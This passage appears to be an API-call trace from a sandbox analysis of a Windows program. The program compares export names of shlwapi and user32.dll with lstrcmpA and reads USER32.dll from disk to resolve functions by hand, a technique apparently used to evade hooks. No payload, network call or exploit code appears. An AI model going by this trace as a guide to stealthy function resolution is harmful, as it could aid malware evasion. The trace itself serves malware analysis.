returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0278.348] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0278.349] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0278.349] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0278.349] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0278.349] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0278.349] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0278.349] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0278.350] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0278.367] GetProcessHeap () returned 0x470000 [0278.367] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x470000) returned 1 [0278.367] GetProcessHeap () returned 0x470000 [0278.367] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489140 [0278.367] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0278.367] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0278.367] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0278.368] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0278.368] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0278.369] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0278.369] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0278.369] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0278.369] GetProcessHeap () returned 0x470000 [0278.369] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1555b8) returned 0x40c6040 [0278.373] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0278.373] ReadFile (in: hFile=0x17c, lpBuffer=0x40c6040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c6040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0278.556] CloseHandle (hObject=0x17c) returned 1 [0278.556] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0278.557] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0278.557] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0278.557] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0278.557] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0278.557] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0278.557] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0278.557] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0278.557] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0278.557] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0278.557] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0278.557] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0278.557] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0278.557] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0278.557] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0278.557] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0278.557] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0278.557] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0278.557] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0278.557] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0278.558] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0278.558] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0278.558] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0278.558] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0278.558] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0278.558] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0278.558] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0278.558] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0278.558] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0278.558] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0278.558] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0278.558] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0278.558] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0278.558] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0278.558] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0278.558] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0278.559] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0278.559] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0278.559] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0278.559] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0278.559] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0278.559] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0278.559] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0278.559] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0278.559] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0278.559] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0278.559] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0278.560] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0278.560] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0278.560] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0278.560] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0278.560] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0278.560] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0278.560] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0278.560] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0278.560] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0278.560] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0278.560] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0278.560] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0278.560] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0278.560] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0278.560] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0278.560] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0278.561] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0278.561] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0278.561] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0278.561] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0278.561] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0278.561] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0278.561] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0278.562] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0278.562] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0278.563] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0278.563] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0278.563] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0278.563] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0278.563] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0278.563] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0278.563] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0278.563] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0278.563] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0278.563] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0278.563] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0278.563] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0278.563] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0278.564] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0278.564] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0278.564] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0278.564] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0278.564] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0278.564] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0278.564] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0278.564] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0278.564] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0278.564] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0278.565] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0278.566] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0278.567] lstrcmpA (lpString1="BroadcastSystemMessageExW", 